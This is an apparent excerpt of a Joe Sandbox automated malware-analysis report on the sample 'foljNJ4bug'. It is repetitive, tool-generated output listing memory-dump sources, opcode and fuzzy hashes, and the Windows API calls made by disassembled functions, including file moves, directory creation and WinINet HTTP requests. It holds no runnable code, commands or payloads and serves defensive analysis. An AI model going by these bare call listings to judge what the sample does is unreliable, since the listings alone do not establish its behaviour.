                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                                              • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                                                              • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                                              • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 978794511-0
                                                                                                                                              • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                                              • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                                                              • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                                              • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                              • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                                                              • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                              • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1473721057-0
                                                                                                                                              • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                              • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                                                              • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                              • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove$_memcmp
                                                                                                                                              • String ID: '$\$h
                                                                                                                                              • API String ID: 2205784470-1303700344
                                                                                                                                              • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                                              • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                                                                              • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                                              • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                                                                              APIs
                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                                                              • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                                                              • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                                                              • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                                                              • __swprintf.LIBCMT ref: 0045EC33
                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                                                              Strings
                                                                                                                                              • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                                                              • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                                              • API String ID: 2441338619-1568723262
                                                                                                                                              • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                                                              • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                                                              • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                                                              • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                                                              APIs
                                                                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                              • String ID: @COM_EVENTOBJ
                                                                                                                                              • API String ID: 327565842-2228938565
                                                                                                                                              • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                                                              • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                                                              • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                                                              • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                                                              APIs
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                                                              • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                                                                • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                                                                • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                                                              • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                                                              • String ID: H
                                                                                                                                              • API String ID: 3613100350-2852464175
                                                                                                                                              • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                                                              • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                                                              • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                                                              • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                                                              APIs
                                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                                                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1291720006-3916222277
                                                                                                                                              • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                                              • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                                                              • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                                              • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                                                              APIs
                                                                                                                                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                                              • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                                              • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                              • String ID: 0$2
                                                                                                                                              • API String ID: 93392585-3793063076
                                                                                                                                              • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                              • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                                              • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                              • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                                              APIs
                                                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                                                              • String ID: crts
                                                                                                                                              • API String ID: 586820018-3724388283
                                                                                                                                              • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                              • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                                                              • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                              • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                                                              • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                                                              • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                                                              • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                                                              • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                                              • String ID: \*.*
                                                                                                                                              • API String ID: 2326526234-1173974218
                                                                                                                                              • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                              • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                                                              • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                              • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                                                              • _wcslen.LIBCMT ref: 004335F2
                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                                                              • GetLastError.KERNEL32 ref: 0043362B
                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                                                              • _wcsrchr.LIBCMT ref: 00433666
                                                                                                                                                • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                              • String ID: \
                                                                                                                                              • API String ID: 321622961-2967466578
                                                                                                                                              • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                                                                              • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                                                              • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                                                                              • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
